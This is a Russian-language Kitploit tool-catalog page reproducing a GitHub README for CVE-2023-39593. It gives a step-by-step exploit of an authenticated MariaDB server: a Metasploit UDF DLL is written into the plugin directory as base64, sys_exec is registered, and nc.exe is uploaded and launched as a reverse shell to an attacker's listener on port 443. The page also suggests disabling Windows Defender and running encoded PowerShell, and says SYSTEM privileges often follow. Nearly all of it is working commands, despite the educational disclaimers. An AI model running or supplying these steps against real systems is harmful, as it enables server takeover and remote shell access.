Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-39593 — Выполнение кода через аутентифицированный доступ к базе данных | Kitploit
Инструменты/GitHubGitHub/ant1sec-ops/cve-2023-39593
Повышение привилегийЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной НагрузкиБезопасность Баз Данных
GitHubant1sec-ops/cve-2023-39593

CVE-2023-39593

Выполнение кода через аутентифицированный доступ к базе данных

231 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

MariaDB 10.5 Аутентифицированное выполнение кода - sys_exec

Это руководство предоставляет подробные инструкции по эксплуатации уязвимости пользовательской функции (UDF) в MariaDB на удаленном сервере. Эти шаги включают загрузку и выполнение вредоносного кода в уязвимой системе базы данных.

Предупреждение: Этот документ предназначен только для образовательных целей. Несанкционированное использование этих методов является незаконным и неэтичным.

Шаги по воспроизведению атаки

1. Подключение к удаленному хосту MariaDB

Используйте следующую команду для подключения к серверу MySQL:

root@kitploit:~
mysql -h 192.168.214.129 -u root -pPassw0rd!

2. Проверка версии MariaDB

Чтобы определить версию запущенного MySQL, выполните:

root@kitploit:~
select @@version;

3. Список всех пользователей

Чтобы увидеть текущего пользователя, выполните вход:

root@kitploit:~
select user();

4. Вывод всей информации о пользователе root

Получите все сведения, связанные с пользователем root:

root@kitploit:~
select * from mysql.user where user='root';

5. Проверка привилегий пользователя

Определите, какие привилегии есть у текущего пользователя:

root@kitploit:~
show grants;

6. Проверка архитектуры системы

Определите, уязвима ли архитектура системы для UDF:

root@kitploit:~
select @@version_compile_os, @@version_compile_machine;

7. Проверка каталога плагинов

Определите каталог плагинов, куда можно загружать UDF-файлы:

root@kitploit:~
select @@plugin_dir;

8. Копирование 32-битной DLL

Скопируйте 32-битную DLL из каталога эксплойтов Metasploit:

root@kitploit:~
ls /usr/share/metasploit-framework/data/exploits/mysql/
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll udf.dll

9. Преобразование DLL в формат Base64

Закодируйте файл udf.dll в формат base64:

root@kitploit:~
cat udf.dll | base64 | tr -d '\n' > udf.base64

10. Передача DLL на сервер MySQL

Скопируйте значение base64 из udf.base64 и передайте его на сервер MySQL:

Откройте udf.base64 в текстовом редакторе:

root@kitploit:~
leafpad udf.base64

В MariaDB выполните:

root@kitploit:~
select from_base64("base64 значение") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\udf.dll';

При необходимости используйте следующий путь:

root@kitploit:~
C:\Program Files\MariaDB 11.1\lib\plugin\

11. Загрузка UDF-функции в MariaDB

Выполните следующую команду в MariaDB для создания новой функции:

root@kitploit:~
create function sys_exec returns int soname 'udf.dll';

Примечание: Вы также можете использовать sys_eval, sys_get, do_system или sys_bineval. Убедитесь, что используете int, а не into.

12. Проверка установки UDF

Проверьте, была ли успешно установлена UDF-функция:

root@kitploit:~
select * from mysql.func;

13. Подготовка бинарного файла Netcat

Скопируйте исполняемый файл Netcat в локальный каталог и закодируйте его в base64:

root@kitploit:~
cp /usr/share/windows-binaries/nc.exe .
cat nc.exe | base64 | tr -d '\n' > nc.base64

14. Передача Netcat на сервер MariaDB

Откройте nc.base64 в текстовом редакторе:

root@kitploit:~
leafpad nc.base64

Затем в MySQL:

root@kitploit:~
select from_base64("base64значениеNc.exe") into dumpfile 'C:\\Program Files\\MariaDB 10.5\\lib\\plugin\\nc.exe';

Альтернативно можно загрузить напрямую с помощью:

root@kitploit:~
mysql -u root -p -h 192.168.214.129 < nc.base64

15. Запуск Netcat для обратной оболочки

Включите прослушиватель Netcat на порту 443:

root@kitploit:~
sudo nc -nlvp 443

Запустите Netcat на удаленном сервере для обратной оболочки:

root@kitploit:~
select sys_exec('C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe 192.168.214.128 443 -e cmd.exe');

Примечание: Этот шаг может быть заблокирован Защитником Windows или другим антивирусным программным обеспечением. Рассмотрите возможность использования закодированных команд PowerShell (powershellbase64) и убедитесь, что Защитник отключен.

16. Выполнение команд PowerShell

Выполните команду PowerShell с помощью кодировки base64:

root@kitploit:~
select sys_exec('powershellbase64');

ПРИМЕЧАНИЕ: Во многих случаях вы можете получить привилегии NT AUTHORITY SYSTEM.

Дополнительная информация

  • Удаление функции: Чтобы удалить любые созданные UDF-функции:

    root@kitploit:~
    drop function sys_get;
    
  • Проверка Local Infile: Проверьте, включена ли локальная запись:

    root@kitploit:~
    show variables like 'local_infile';
    
  • Поиск пользователей с привилегией Insert: Определите, какие пользователи имеют привилегию insert:

    root@kitploit:~
    use mysql;
    select user from user where insert_priv='Y' and Host='%';
    

Отказ от ответственности: Этот документ предназначен только для образовательных целей и исследований в области безопасности. Неправильное использование этой информации может привести к уголовному преследованию и серьезным правовым последствиям. Всегда получайте разрешение от соответствующих органов перед тестированием любых уязвимостей в сети или системе.

Скачать инструмент